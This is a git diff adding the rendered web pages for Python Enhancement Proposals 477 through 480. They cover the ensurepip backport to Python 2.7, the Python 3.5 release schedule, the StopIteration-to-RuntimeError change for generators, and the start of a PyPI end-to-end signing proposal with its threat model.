+ + + + + \ No newline at end of file diff --git a/pep-0477/index.html b/pep-0477/index.html new file mode 100644 index 00000000000..8d4493d35ad --- /dev/null +++ b/pep-0477/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 477 – Backport ensurepip (PEP 453) to Python 2.7 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 477 – Backport ensurepip (PEP 453) to Python 2.7

+
+
Author:
+
Donald Stufft <donald at stufft.io>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Aug-2014
+
Post-History:
+
01-Sep-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes that the ensurepip module, added to Python 3.4 by PEP 453, be backported to Python 2.7. It also proposes that automatic invocation of ensurepip be added to the Python 2.7 Windows and OSX installers. However, it does not propose that automatic invocation be added to the Makefile.

+

It also proposes that the documentation changes for the package distribution +and installation guides be updated to match that in 3.4, which references using +the ensurepip module to bootstrap the installer.

+
+
+

Rationale

+

Python 2.7 is effectively an LTS release of Python which represents the end of the 2.x series, and there is still a very large contingent of users who use Python 2.7 as their primary version. These users, in order to participate in the wider Python ecosystem, must manually attempt to go out and find the correct way to bootstrap the packaging tools.

+

It is the opinion of this PEP that making it as easy as possible for end users to participate in the wider Python ecosystem is important for four primary reasons:

+
    +
  1. The Python 2.x to 3.x migration has a number of pain points that are eased by a number of third party modules such as six [1], modernize [2], or future [3]. However, relying on these tools requires that everyone who uses the project have a tool to install these packages.
  2. +
  3. In addition to tooling to aid in migration from Python 2.x to 3.x, there are +also a number of modules that are new in Python 3 for which there are +backports available on PyPI. This can also aid in the ability for people +to write 2.x and 3.x compatible software as well as enable them to use some +of the newer features of Python 3 on Python 2.
  4. +
  5. Users also will need a number of tools in order to create Python packages that conform to the newer standards that are being proposed. Things like setuptools [4], Wheel [5], and twine [6] are enabling a safer, faster, and more reliable packaging tool chain. These tools can be difficult for people to use if they must first be told how to go out and install the package manager.
  6. +
  7. One of Python’s biggest strengths is the huge ecosystem of libraries and projects that have been built on top of it, most of which are distributed through PyPI. However, benefiting meaningfully from this wide ecosystem requires end users, some of whom are going to be new, to decide which package manager they should get, work out how to get it, and then actually install it first.
  8. +
+

Furthermore, alternative implementations of Python are recognizing the benefits +of PEP 453 and both PyPy and Jython have plans to backport ensurepip to their +2.7 runtimes.

+
+
+

Automatic Invocation

+

PEP 453 has ensurepip automatically invoked by default in the Makefile and the Windows and OSX installers. This allowed it to ensure that, by default, all users would get Python with pip already installed. This PEP, however, believes that while this is fine for the Python 2.7 Windows and Mac OS X installers, it is not OK for the Python 2.7 Makefile in general.

+

The primary consumers of the Makefile are downstream package managers which +distribute Python themselves. These downstream distributors typically do not +want pip to be installed via ensurepip and would prefer that end users +install it with their own package manager. Not invoking ensurepip +automatically from the Makefile would allow these distributors to simply +ignore the fact that ensurepip has been backported and still not end up +with pip installed via it.

+

The primary consumers of the OSX and Windows installers are end users who are +attempting to install Python on their own machine. There is not a package +manager available where these users can install pip into their Python through +a more supported mechanism. For this reason it is the belief of this PEP that +installing by default on OSX and Windows is the best course of action.

+
+
+

Documentation

+

As part of this PEP, the updated packaging distribution and installation +guides for Python 3.4 would be backported to Python 2.7.

+
+
+

Disabling ensurepip by Downstream Distributors

+

Due to its use in the venv module, downstream distributors cannot disable the ensurepip module in Python 3.4. However, since Python 2.7 has no such module, it is explicitly allowed for downstream distributors to patch the ensurepip module to prevent it from installing anything.

+

If a downstream distributor wishes to disable ensurepip completely in Python 2.7, they should still at least provide the module and allow python -m ensurepip style invocation. However, it should raise errors or otherwise exit with a non-zero exit code and print out an error on stderr directing users to what they can/should use instead of ensurepip.
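A hypothetical sketch of such a patched module, which keeps python -m ensurepip invocable but fails loudly:

# ensurepip/__main__.py, as patched by a downstream distributor
import sys

sys.stderr.write(
    "ensurepip is disabled in this build; install pip with your "
    "system package manager instead (e.g. 'apt-get install python-pip').\n"
)
sys.exit(1)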

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0477.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0478/index.html b/pep-0478/index.html new file mode 100644 index 00000000000..06d31d92eec --- /dev/null +++ b/pep-0478/index.html @@ -0,0 +1,212 @@ + + + + + + + + PEP 478 – Python 3.5 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 478 – Python 3.5 Release Schedule

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
22-Sep-2014
+
Python-Version:
+
3.5
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.5. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.5 Release Manager: Larry Hastings
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

Release Schedule

+

Python 3.5 has now reached its end-of-life and has been retired. +No more releases will be made.

+

These are all the historical releases of Python 3.5, +including their release dates.

+
    +
  • 3.5.0 alpha 1: February 8, 2015
  • +
  • 3.5.0 alpha 2: March 9, 2015
  • +
  • 3.5.0 alpha 3: March 29, 2015
  • +
  • 3.5.0 alpha 4: April 19, 2015
  • +
  • 3.5.0 beta 1: May 24, 2015 +(Beta 1 is also “feature freeze”–no new features beyond this point.)
  • +
  • 3.5.0 beta 2: May 31, 2015
  • +
  • 3.5.0 beta 3: July 5, 2015
  • +
  • 3.5.0 beta 4: July 26, 2015
  • +
  • 3.5.0 release candidate 1: August 10, 2015
  • +
  • 3.5.0 release candidate 2: August 25, 2015
  • +
  • 3.5.0 release candidate 3: September 7, 2015
  • +
  • 3.5.0 final: September 13, 2015
  • +
  • 3.5.1 release candidate 1: November 22, 2015
  • +
  • 3.5.1 final: December 6, 2015
  • +
  • 3.5.2 release candidate 1: Sunday, June 12, 2016
  • +
  • 3.5.2 final: Sunday, June 26, 2016
  • +
  • 3.5.3 candidate 1: January 2, 2017
  • +
  • 3.5.3 final: January 17, 2017
  • +
  • 3.5.4 candidate 1: July 25, 2017
  • +
  • 3.5.4 final: August 8, 2017
  • +
  • 3.5.5 candidate 1: January 23, 2018
  • +
  • 3.5.5 final: February 4, 2018
  • +
  • 3.5.6 candidate 1: July 19, 2018
  • +
  • 3.5.6 final: August 2, 2018
  • +
  • 3.5.7 candidate 1: March 4, 2019
  • +
  • 3.5.7 final: March 18, 2019
  • +
  • 3.5.8 candidate 1: September 9, 2019
  • +
  • 3.5.8 candidate 2: October 12, 2019
  • +
  • 3.5.8 final: October 29, 2019
  • +
  • 3.5.9 final: November 1, 2019
  • +
  • 3.5.10 rc1: August 21, 2020
  • +
  • 3.5.10 final: September 5, 2020
  • +
+
+
+

Features for 3.5

+
    +
  • PEP 441, improved Python zip application support
  • +
  • PEP 448, additional unpacking generalizations
  • +
  • PEP 461, “%-formatting” for bytes and bytearray objects
  • +
  • PEP 465, a new operator (“@”) for matrix multiplication
  • +
  • PEP 471, os.scandir(), a fast new directory traversal function
  • +
  • PEP 475, adding support for automatic retries of interrupted system calls
  • +
  • PEP 479, change StopIteration handling inside generators
  • +
  • PEP 484, the typing module, a new standard for type annotations
  • +
  • PEP 485, math.isclose(), a function for testing approximate equality
  • +
  • PEP 486, making the Windows Python launcher aware of virtual environments
  • +
  • PEP 488, eliminating .pyo files
  • +
  • PEP 489, a new and improved mechanism for loading extension modules
  • +
  • PEP 492, coroutines with async and await syntax
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0478.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0479/index.html b/pep-0479/index.html new file mode 100644 index 00000000000..68ad7b1db8f --- /dev/null +++ b/pep-0479/index.html @@ -0,0 +1,743 @@ + + + + + + + + PEP 479 – Change StopIteration handling inside generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 479 – Change StopIteration handling inside generators

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Nov-2014
+
Python-Version:
+
3.5
+
Post-History:
+
15-Nov-2014, 19-Nov-2014, 05-Dec-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change to generators: when StopIteration is +raised inside a generator, it is replaced with RuntimeError. +(More precisely, this happens when the exception is about to bubble +out of the generator’s stack frame.) Because the change is backwards +incompatible, the feature is initially introduced using a +__future__ statement.

+
+
+

Acceptance

+

This PEP was accepted by the BDFL on November 22. Because of the +exceptionally short period from first draft to acceptance, the main +objections brought up after acceptance were carefully considered and +have been reflected in the “Alternate proposals” section below. +However, none of the discussion changed the BDFL’s mind and the PEP’s +acceptance is now final. (Suggestions for clarifying edits are still +welcome – unlike IETF RFCs, the text of a PEP is not cast in stone +after its acceptance, although the core design/plan/specification +should not change after acceptance.)

+
+
+

Rationale

+

The interaction of generators and StopIteration is currently +somewhat surprising, and can conceal obscure bugs. An unexpected +exception should not result in subtly altered behaviour, but should +cause a noisy and easily-debugged traceback. Currently, +StopIteration raised accidentally inside a generator function will +be interpreted as the end of the iteration by the loop construct +driving the generator.

+

The main goal of the proposal is to ease debugging in the situation +where an unguarded next() call (perhaps several stack frames deep) +raises StopIteration and causes the iteration controlled by the +generator to terminate silently. (Whereas, when some other exception +is raised, a traceback is printed pinpointing the cause of the +problem.)

+

This is particularly pernicious in combination with the yield from +construct of PEP 380, as it breaks the abstraction that a +subgenerator may be factored out of a generator. That PEP notes this +limitation, but notes that “use cases for these [are] rare to +non-existent”. Unfortunately while intentional use is rare, it is +easy to stumble on these cases by accident:

+
import contextlib
+
+@contextlib.contextmanager
+def transaction():
+    print('begin')
+    try:
+        yield from do_it()
+    except:
+        print('rollback')
+        raise
+    else:
+        print('commit')
+
+def do_it():
+    print('Refactored initial setup')
+    yield # Body of with-statement is executed here
+    print('Refactored finalization of successful transaction')
+
+def gene():
+    for i in range(2):
+        with transaction():
+            yield i
+            # return
+            raise StopIteration  # This is wrong
+        print('Should not be reached')
+
+for i in gene():
+    print('main: i =', i)
+
+
+

Here factoring out do_it into a subgenerator has introduced a +subtle bug: if the wrapped block raises StopIteration, under the +current behavior this exception will be swallowed by the context +manager; and, worse, the finalization is silently skipped! Similarly +problematic behavior occurs when an asyncio coroutine raises +StopIteration, causing it to terminate silently, or when next +is used to take the first result from an iterator that unexpectedly +turns out to be empty, for example:

+
# using the same context manager as above
+import pathlib
+
+with transaction():
+    print('commit file {}'.format(
+        # I can never remember what the README extension is
+        next(pathlib.Path('/some/dir').glob('README*'))))
+
+
+

In both cases, the refactoring abstraction of yield from breaks +in the presence of bugs in client code.

+

Additionally, the proposal reduces the difference between list +comprehensions and generator expressions, preventing surprises such as +the one that started this discussion [2]. Henceforth, the following +statements will produce the same result if either produces a result at +all:

+
a = list(F(x) for x in xs if P(x))
+a = [F(x) for x in xs if P(x)]
+
+
+

With the current state of affairs, it is possible to write a function +F(x) or a predicate P(x) that causes the first form to produce +a (truncated) result, while the second form raises an exception +(namely, StopIteration). With the proposed change, both forms +will raise an exception at this point (albeit RuntimeError in the +first case and StopIteration in the second).
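For example, with the following contrived predicate (illustrative code; the commented results assume the semantics without the __future__ import):

def F(x):
    return x * 10

def P(x):
    if x == 3:
        raise StopIteration  # simulates a buggy predicate
    return True

xs = [1, 2, 3, 4]
a = list(F(x) for x in xs if P(x))  # silently truncated: [10, 20]
a = [F(x) for x in xs if P(x)]      # StopIteration escapes to the caller
# Under this proposal, the first form raises RuntimeError instead.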

+

Finally, the proposal also clears up the confusion about how to +terminate a generator: the proper way is return, not +raise StopIteration.

+

As an added bonus, the above changes bring generator functions much +more in line with regular functions. If you wish to take a piece of +code presented as a generator and turn it into something else, you +can usually do this fairly simply, by replacing every yield with +a call to print() or list.append(); however, if there are any +bare next() calls in the code, you have to be aware of them. If +the code was originally written without relying on StopIteration +terminating the function, the transformation would be that much +easier.

+
+
+

Background information

+

When a generator frame is (re)started as a result of a __next__() +(or send() or throw()) call, one of three outcomes can occur:

+
    +
  • A yield point is reached, and the yielded value is returned.
  • +
  • The frame is returned from; StopIteration is raised.
  • +
  • An exception is raised, which bubbles out.
  • +
+

In the latter two cases the frame is abandoned (and the generator +object’s gi_frame attribute is set to None).

+
+
+

Proposal

+

If a StopIteration is about to bubble out of a generator frame, it +is replaced with RuntimeError, which causes the next() call +(which invoked the generator) to fail, passing that exception out. +From then on it’s just like any old exception. [3]

+

This affects the third outcome listed above, without altering any +other effects. Furthermore, it only affects this outcome when the +exception raised is StopIteration (or a subclass thereof).

+

Note that the proposed replacement happens at the point where the +exception is about to bubble out of the frame, i.e. after any +except or finally blocks that could affect it have been +exited. The StopIteration raised by returning from the frame is +not affected (the point being that StopIteration means that the +generator terminated “normally”, i.e. it did not raise an exception).

+

A subtle issue is what will happen if the caller, having caught the +RuntimeError, calls the generator object’s __next__() method +again. The answer is that from this point on it will raise +StopIteration – the behavior is the same as when any other +exception was raised by the generator.

+

Another logical consequence of the proposal: if someone uses +g.throw(StopIteration) to throw a StopIteration exception into +a generator, if the generator doesn’t catch it (which it could do +using a try/except around the yield), it will be transformed +into RuntimeError.

+

During the transition phase, the new feature must be enabled +per-module using:

+
from __future__ import generator_stop
+
+
+

Any generator function constructed under the influence of this +directive will have the REPLACE_STOPITERATION flag set on its code +object, and generators with the flag set will behave according to this +proposal. Once the feature becomes standard, the flag may be dropped; +code should not inspect generators for it.

+

A proof-of-concept patch has been created to facilitate testing. [4]

+
+
+

Consequences for existing code

+

This change will affect existing code that depends on +StopIteration bubbling up. The pure Python reference +implementation of groupby [5] currently has comments “Exit on +StopIteration” where it is expected that the exception will +propagate and then be handled. This will be unusual, but not unknown, +and such constructs will fail. Other examples abound, e.g. [6], [7].

+

(Alyssa Coghlan comments: “””If you wanted to factor out a helper +function that terminated the generator you’d have to do “return +yield from helper()” rather than just “helper()”.”””)

+

There are also examples of generator expressions floating around that +rely on a StopIteration raised by the expression, the target or the +predicate (rather than by the __next__() call implied in the for +loop proper).

+
+

Writing backwards and forwards compatible code

+

With the exception of hacks that raise StopIteration to exit a +generator expression, it is easy to write code that works equally well +under older Python versions as under the new semantics.

+

This is done by enclosing those places in the generator body where a +StopIteration is expected (e.g. bare next() calls or in some +cases helper functions that are expected to raise StopIteration) +in a try/except construct that returns when StopIteration is +raised. The try/except construct should appear directly in the +generator function; doing this in a helper function that is not itself +a generator does not work. If raise StopIteration occurs directly +in a generator, simply replace it with return.
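For example, a generator containing bare next() calls can be written portably as follows (pairs is an illustrative helper, not a stdlib function):

def pairs(iterable):
    it = iter(iterable)
    while True:
        try:
            first = next(it)
            second = next(it)
        except StopIteration:
            return  # works with and without generator_stop
        yield first, second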

+
+
+

Examples of breakage

+

Generators which explicitly raise StopIteration can generally be +changed to simply return instead. This will be compatible with all +existing Python versions, and will not be affected by __future__. +Here are some illustrations from the standard library.

+

Lib/ipaddress.py:

+
if other == self:
+    raise StopIteration
+
+
+

Becomes:

+
if other == self:
+    return
+
+
+

In some cases, this can be combined with yield from to simplify +the code, such as Lib/difflib.py:

+
if context is None:
+    while True:
+        yield next(line_pair_iterator)
+
+
+

Becomes:

+
if context is None:
+    yield from line_pair_iterator
+    return
+
+
+

(The return is necessary for a strictly-equivalent translation, +though in this particular file, there is no further code, and the +return can be omitted.) For compatibility with pre-3.3 versions +of Python, this could be written with an explicit for loop:

+
if context is None:
+    for line in line_pair_iterator:
+        yield line
+    return
+
+
+

More complicated iteration patterns will need explicit try/except +constructs. For example, a hypothetical parser like this:

+
def parser(f):
+    while True:
+        data = next(f)
+        while True:
+            line = next(f)
+            if line == "- end -": break
+            data += line
+        yield data
+
+
+

would need to be rewritten as:

+
def parser(f):
+    while True:
+        try:
+            data = next(f)
+            while True:
+                line = next(f)
+                if line == "- end -": break
+                data += line
+            yield data
+        except StopIteration:
+            return
+
+
+

or possibly:

+
def parser(f):
+    for data in f:
+        while True:
+            line = next(f)
+            if line == "- end -": break
+            data += line
+        yield data
+
+
+

The latter form obscures the iteration by purporting to iterate over +the file with a for loop, but then also fetches more data from +the same iterator during the loop body. It does, however, clearly +differentiate between a “normal” termination (StopIteration +instead of the initial line) and an “abnormal” termination (failing +to find the end marker in the inner loop, which will now raise +RuntimeError).

+

This effect of StopIteration has been used to cut a generator +expression short, creating a form of takewhile:

+
def stop():
+    raise StopIteration
+print(list(x for x in range(10) if x < 5 or stop()))
+# prints [0, 1, 2, 3, 4]
+
+
+

Under the current proposal, this form of non-local flow control is +not supported, and would have to be rewritten in statement form:

+
def gen():
+    for x in range(10):
+        if x >= 5: return
+        yield x
+print(list(gen()))
+# prints [0, 1, 2, 3, 4]
+
+
+

While this is a small loss of functionality, it is functionality that +often comes at the cost of readability, and just as lambda has +restrictions compared to def, so does a generator expression have +restrictions compared to a generator function. In many cases, the +transformation to full generator function will be trivially easy, and +may improve structural clarity.

+
+
+
+

Explanation of generators, iterators, and StopIteration

+

The proposal does not change the relationship between generators and +iterators: a generator object is still an iterator, and not all +iterators are generators. Generators have additional methods that +iterators don’t have, like send and throw. All this is +unchanged. Nothing changes for generator users – only authors of +generator functions may have to learn something new. (This includes +authors of generator expressions that depend on early termination of +the iteration by a StopIteration raised in a condition.)

+

An iterator is an object with a __next__ method. Like many other +special methods, it may either return a value, or raise a specific +exception - in this case, StopIteration - to signal that it has +no value to return. In this, it is similar to __getattr__ (can +raise AttributeError), __getitem__ (can raise KeyError), +and so on. A helper function for an iterator can be written to +follow the same protocol; for example:

+
def helper(x, y):
+    if x > y: return 1 / (x - y)
+    raise StopIteration
+
+def __next__(self):
+    if self.a: return helper(self.b, self.c)
+    return helper(self.d, self.e)
+
+
+

Both forms of signalling are carried through: a returned value is +returned, an exception bubbles up. The helper is written to match +the protocol of the calling function.

+

A generator function is one which contains a yield expression. +Each time it is (re)started, it may either yield a value, or return +(including “falling off the end”). A helper function for a generator +can also be written, but it must also follow generator protocol:

+
def helper(x, y):
+    if x > y: yield 1 / (x - y)
+
+def gen(self):
+    if self.a: return (yield from helper(self.b, self.c))
+    return (yield from helper(self.d, self.e))
+
+
+

In both cases, any unexpected exception will bubble up. Due to the +nature of generators and iterators, an unexpected StopIteration +inside a generator will be converted into RuntimeError, but +beyond that, all exceptions will propagate normally.

+
+
+

Transition plan

+
    +
  • Python 3.5: Enable new semantics under __future__ import; silent +deprecation warning if StopIteration bubbles out of a generator +not under __future__ import.
  • +
  • Python 3.6: Non-silent deprecation warning.
  • +
  • Python 3.7: Enable new semantics everywhere.
  • +
+
+
+

Alternate proposals

+
+

Raising something other than RuntimeError

+

Rather than the generic RuntimeError, it might make sense to raise +a new exception type UnexpectedStopIteration. This has the +downside of implicitly encouraging that it be caught; the correct +action is to catch the original StopIteration, not the chained +exception.

+
+
+

Supplying a specific exception to raise on return

+

Alyssa (Nick) Coghlan suggested a means of providing a specific +StopIteration instance to the generator; if any other instance of +StopIteration is raised, it is an error, but if that particular +one is raised, the generator has properly completed. This subproposal +has been withdrawn in favour of better options, but is retained for +reference.

+
+
+

Making return-triggered StopIterations obvious

+

For certain situations, a simpler and fully backward-compatible +solution may be sufficient: when a generator returns, instead of +raising StopIteration, it raises a specific subclass of +StopIteration (GeneratorReturn) which can then be detected. +If it is not that subclass, it is an escaping exception rather than a +return statement.

+

The inspiration for this alternative proposal was Alyssa’s observation +[8] that if an asyncio coroutine [9] accidentally raises +StopIteration, it currently terminates silently, which may present +a hard-to-debug mystery to the developer. The main proposal turns +such accidents into clearly distinguishable RuntimeError exceptions, +but if that is rejected, this alternate proposal would enable +asyncio to distinguish between a return statement and an +accidentally-raised StopIteration exception.

+

Of the three outcomes listed above, two change:

+
    +
  • If a yield point is reached, the value, obviously, would still be +returned.
  • +
  • If the frame is returned from, GeneratorReturn (rather than +StopIteration) is raised.
  • +
  • If an instance of GeneratorReturn would be raised, instead an +instance of StopIteration would be raised. Any other exception +bubbles up normally.
  • +
+

In the third case, the StopIteration would have the value of +the original GeneratorReturn, and would reference the original +exception in its __cause__. If uncaught, this would clearly show +the chaining of exceptions.

+

This alternative does not affect the discrepancy between generator +expressions and list comprehensions, but allows generator-aware code +(such as the contextlib and asyncio modules) to reliably +differentiate between the second and third outcomes listed above.

+

However, once code exists that depends on this distinction between +GeneratorReturn and StopIteration, a generator that invokes +another generator and relies on the latter’s StopIteration to +bubble out would still be potentially wrong, depending on the use made +of the distinction between the two exception types.

+
+
+

Converting the exception inside next()

+

Mark Shannon suggested [10] that the problem could be solved in next() rather than at the boundary of generator functions. By having next() catch StopIteration and raise ValueError instead, all unexpected StopIteration bubbling would be prevented; however, the backward-incompatibility concerns are far more serious than for the current proposal, as every next() call now needs to be rewritten to guard against ValueError instead of StopIteration – not to mention that there is no way to write one block of code which reliably works on multiple versions of Python. (Using a dedicated exception type, perhaps subclassing ValueError, would help this; however, all code would still need to be rewritten.)

+

Note that calling next(it, default) catches StopIteration and +substitutes the given default value; this feature is often useful to +avoid a try/except block.

+
+
+

Sub-proposal: decorator to explicitly request current behaviour

+

Alyssa Coghlan suggested [11] that the situations where the current +behaviour is desired could be supported by means of a decorator:

+
from itertools import allow_implicit_stop
+
+@allow_implicit_stop
+def my_generator():
+    ...
+    yield next(it)
+    ...
+
+
+

Which would be semantically equivalent to:

+
def my_generator():
+    try:
+        ...
+        yield next(it)
+        ...
+    except StopIteration:
+        return
+
+
+

but be faster, as it could be implemented by simply permitting the +StopIteration to bubble up directly.

+

Single-source Python 2/3 code would also benefit in a 3.7+ world, +since libraries like six and python-future could just define their own +version of “allow_implicit_stop” that referred to the new builtin in +3.5+, and was implemented as an identity function in other versions.

+

However, due to the implementation complexities required, the ongoing +compatibility issues created, the subtlety of the decorator’s effect, +and the fact that it would encourage the “quick-fix” solution of just +slapping the decorator onto all generators instead of properly fixing +the code in question, this sub-proposal has been rejected. [12]

+
+
+
+

Criticism

+

Unofficial and apocryphal statistics suggest that this is seldom, if +ever, a problem. [13] Code does exist which relies on the current +behaviour (e.g. [3], [6], [7]), and there is the concern that this +would be unnecessary code churn to achieve little or no gain.

+

Steven D’Aprano started an informal survey on comp.lang.python [14]; +at the time of writing only two responses have been received: one was +in favor of changing list comprehensions to match generator +expressions (!), the other was in favor of this PEP’s main proposal.

+

The existing model has been compared to the perfectly-acceptable +issues inherent to every other case where an exception has special +meaning. For instance, an unexpected KeyError inside a +__getitem__ method will be interpreted as failure, rather than +permitted to bubble up. However, there is a difference. Special +methods use return to indicate normality, and raise to signal +abnormality; generators yield to indicate data, and return to +signal the abnormal state. This makes explicitly raising +StopIteration entirely redundant, and potentially surprising. If +other special methods had dedicated keywords to distinguish between +their return paths, they too could turn unexpected exceptions into +RuntimeError; the fact that they cannot should not preclude +generators from doing so.

+
+

Why not fix all __next__() methods?

+

When implementing a regular __next__() method, the only way to +indicate the end of the iteration is to raise StopIteration. So +catching StopIteration here and converting it to RuntimeError +would defeat the purpose. This is a reminder of the special status of +generator functions: in a generator function, raising +StopIteration is redundant since the iteration can be terminated +by a simple return.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0479.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0480/index.html b/pep-0480/index.html new file mode 100644 index 00000000000..0aa08dd2b46 --- /dev/null +++ b/pep-0480/index.html @@ -0,0 +1,1038 @@ + + + + + + + + PEP 480 – Surviving a Compromise of PyPI: End-to-end signing of packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 480 – Surviving a Compromise of PyPI: End-to-end signing of packages

+
+
Author:
+
Trishank Karthik Kuppusamy <karthik at trishank.com>, +Vladimir Diaz <vladimir.diaz at nyu.edu>, +Justin Cappos <jcappos at nyu.edu>, Marina Moore <mm9693 at nyu.edu>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Requires:
+
458
+
Created:
+
08-Oct-2014
+
+
+
+
+
+

Abstract

+

Proposed is an extension to PEP 458 that adds support for end-to-end signing +and the maximum security model. End-to-end signing allows both PyPI and +developers to sign for the distributions that are downloaded by clients. The +minimum security model proposed by PEP 458 supports continuous delivery of +distributions (because they are signed by online keys), but that model does not +protect distributions in the event that PyPI is compromised. In the minimum +security model, attackers who have compromised the signing keys stored on PyPI +Infrastructure may sign for malicious distributions. The maximum security model, +described in this PEP, retains the benefits of PEP 458 (e.g., immediate +availability of distributions that are uploaded to PyPI), but additionally +ensures that end-users are not at risk of installing forged software if PyPI is +compromised.

+

This PEP requires some changes to the PyPI infrastructure, and some suggested +changes for developers who wish to participate in end-to-end signing. These +changes include updating the metadata layout from PEP 458 to include delegations +to developer keys, adding a process to register developer keys with PyPI, and a +change in the upload workflow for developers who take advantage of end-to-end +signing. All of these changes are described in detail later in this PEP. Package +managers that wish to take advantage of end-to-end signing do not need to do any +additional work beyond what is required to consume metadata described in PEP +458.

+

This PEP discusses the changes made to PEP 458 but excludes its informational +elements to primarily focus on the maximum security model. For example, an +overview of The Update Framework or the basic mechanisms in PEP 458 are not +covered here. The changes to PEP 458 include modifications to the snapshot +process, key compromise analysis, auditing snapshots, and the steps that should +be taken in the event of a PyPI compromise. The signing and key management +process that PyPI MAY RECOMMEND is discussed but not strictly defined. How the +release process should be implemented to manage keys and metadata is left to +the implementors of the signing tools. That is, this PEP delineates the +expected cryptographic key type and signature format included in metadata that +MUST be uploaded by developers in order to support end-to-end verification of +distributions.

+
+
+

PEP Status

+

The community discussed this PEP from 2014 to 2018. Due to the amount +of work required to implement this PEP, discussion was deferred until +after approval for the precursor step in PEP 458. As of mid-2020 PEP +458 is approved and implementation is in progress, and the PEP authors +aim to gain approval so they can secure appropriate funding for +implementation.

+
+
+

Rationale

+

PEP 458 proposes how PyPI should be integrated with The Update Framework +(TUF) [2]. It explains how modern package managers like pip can be made more +secure, and the types of attacks that can be prevented if PyPI is modified on +the server side to include TUF metadata. Package managers can reference the +TUF metadata available on PyPI to download distributions more securely.

+

PEP 458 also describes the metadata layout of the PyPI repository and employs +the minimum security model, which supports continuous delivery of projects and +uses online cryptographic keys to sign the distributions uploaded by +developers. Although the minimum security model guards against most attacks on +software updaters [5] [6], such as mix-and-match and extraneous dependencies +attacks, it can be improved to support end-to-end signing and to prohibit +forged distributions in the event that PyPI is compromised.

+

PEP 480 builds on PEP 458 by adding support for developer signing, and +reducing the reliance on online keys to prevent malicious distributions. +The main strength of PEP 458 and the minimum security model is the automated +and simplified release process: developers may upload distributions and then +have PyPI sign for their distributions. Much of the release process is handled +in an automated fashion by online roles and this approach requires storing +cryptographic signing keys on the PyPI infrastructure. Unfortunately, +cryptographic keys that are stored online are vulnerable to theft. The maximum +security model, proposed in this PEP, permits developers to sign for the +distributions that they make available to PyPI users, and does not put +end-users at risk of downloading malicious distributions if the online keys +stored on PyPI infrastructure are compromised.

+
+
+

Threat Model

+

The threat model assumes the following:

+
• Offline keys are safe and securely stored.
• Attackers can compromise at least one of PyPI’s trusted keys that are stored online, and may do so at once or over a period of time.
• Attackers can respond to client requests.
• Attackers may control any number of developer keys for projects a client does not want to install.

Attackers are considered successful if they can cause a client to install (or +leave installed) something other than the most up-to-date version of the +software the client is updating. When an attacker is preventing the +installation of updates, the attacker’s goal is that clients not realize that +anything is wrong.

+
+
+

Definitions

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be +interpreted as described in RFC 2119.

+

This PEP focuses on integrating TUF with PyPI; however, the reader is +encouraged to read about TUF’s design principles [2]. It is also RECOMMENDED +that the reader be familiar with the TUF specification [3], and PEP 458 +(which this PEP is extending).

+

The following terms used in this PEP are defined in the Python Packaging +Glossary [4]: project, release, distribution.

+

Terms used in this PEP are defined as follows:

+
• Distribution file: A versioned archive file that contains Python packages, modules, and other resource files that are used to distribute a release. The terms distribution file, distribution package [4], or simply distribution or package may be used interchangeably in this PEP.
• Simple index: The HTML page that contains internal links to distribution files.
• Target files: As a rule of thumb, target files are all files on PyPI whose integrity should be guaranteed with TUF. Typically, this includes distribution files, and PyPI metadata such as simple indices.
• Roles: Roles in TUF encompass the set of actions a party is authorized to perform, including what metadata they may sign and which packages they are responsible for. There is one root role in PyPI. There are multiple roles whose responsibilities are delegated to them directly or indirectly by the root role. The term “top-level role” refers to the root role and any role delegated by the root role. Each role has a single metadata file that it is trusted to provide.
• Metadata: Metadata are files that describe roles, other metadata, and target files.
• Repository: A repository is a resource comprised of named metadata and target files. Clients request metadata and target files stored on a repository.
